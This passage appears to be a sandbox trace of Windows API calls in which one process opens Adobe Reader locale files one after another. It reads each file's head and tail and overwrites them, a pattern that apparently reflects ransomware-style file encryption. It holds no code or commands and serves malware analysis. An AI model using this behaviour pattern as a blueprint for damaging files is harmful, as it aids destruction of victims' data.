SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2800 [0067.072] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0067.072] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2800 [0067.072] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867b58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867b58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0067.072] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0067.072] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0067.072] CloseHandle (hObject=0x1cc) returned 1 [0067.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Multimedia.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\multimedia.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0067.077] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.077] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x14200 [0067.077] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.077] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.077] ReleaseMutex (hMutex=0x168) returned 1 [0067.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.CAT", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.CAT", cchWideChar=14, lpMultiByteStr=0x1f7320c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.CAT", lpUsedDefaultChar=0x0) returned 14 [0067.078] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0067.721] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x13200 [0067.721] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0067.827] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x13200 [0067.827] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867b58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867b58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0067.827] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0067.827] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0067.827] CloseHandle (hObject=0x1cc) returned 1 [0067.830] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SendMail.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\sendmail.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0067.921] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.921] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4200 [0067.921] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0067.921] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.921] ReleaseMutex (hMutex=0x168) returned 1 [0067.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.CAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.CAT", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.CAT", lpUsedDefaultChar=0x0) returned 12 [0067.921] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0067.933] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3200 [0067.933] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0067.964] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3200 [0067.964] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0067.965] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0067.965] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0067.965] CloseHandle (hObject=0x1fc) returned 1 [0068.376] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\AdobeCollabSync.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\adobecollabsync.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0068.390] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0068.392] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0068.392] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0068.392] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.392] ReleaseMutex (hMutex=0x168) returned 1 [0068.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.CZE", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0068.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.CZE", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.CZE", lpUsedDefaultChar=0x0) returned 19 [0068.392] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0068.404] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0068.404] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867488*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867488*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0068.405] CloseHandle (hObject=0x1fc) returned 1 [0068.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\IA32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\ia32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0068.418] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0068.418] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe00 [0068.418] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0068.419] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.419] ReleaseMutex (hMutex=0x168) returned 1 [0068.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.CZE", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.CZE", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.CZE", lpUsedDefaultChar=0x0) returned 8 [0068.419] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0068.430] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0068.431] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x345f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0068.431] CloseHandle (hObject=0x1fc) returned 1 [0068.437] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\SaveAsRTF.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\saveasrtf.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.447] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0068.447] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4600 [0068.448] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0068.448] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.448] ReleaseMutex (hMutex=0x168) returned 1 [0068.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.CZE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.CZE", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.CZE", lpUsedDefaultChar=0x0) returned 13 [0068.448] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0068.461] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3600 [0068.461] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0068.473] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3600 [0068.474] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867888*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867888*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0068.474] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0068.474] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0068.475] CloseHandle (hObject=0x1cc) returned 1 [0068.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\accessibility.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\accessibility.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.502] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0068.502] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa600 [0068.502] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0068.503] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.503] ReleaseMutex (hMutex=0x168) returned 1 [0068.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.DAN", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.DAN", cchWideChar=17, lpMultiByteStr=0x1f88d34, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.DAN", lpUsedDefaultChar=0x0) returned 17 [0068.503] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0068.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9600 [0068.507] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0068.512] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9600 [0068.513] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea99b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99b8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0068.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0068.513] WriteFile (in: hFile=0x1cc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0068.513] CloseHandle (hObject=0x1cc) returned 1 [0068.527] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\eBook.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\ebook.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.250] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.250] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0069.250] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.250] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.250] ReleaseMutex (hMutex=0x168) returned 1 [0069.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.DAN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.DAN", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.DAN", lpUsedDefaultChar=0x0) returned 9 [0069.251] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0069.253] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0069.253] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0069.254] CloseHandle (hObject=0x1dc) returned 1 [0069.255] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\ReadOutLoud.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\readoutloud.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.257] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.257] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2a00 [0069.257] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0069.257] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.257] ReleaseMutex (hMutex=0x168) returned 1 [0069.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.DAN", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.DAN", cchWideChar=15, lpMultiByteStr=0x1f7320c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.DAN", lpUsedDefaultChar=0x0) returned 15 [0069.258] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.260] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0069.260] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.261] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0069.261] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e978a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978a8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.261] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0069.261] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0069.261] CloseHandle (hObject=0x1dc) returned 1 [0069.272] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\updater.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\updater.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0069.274] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, 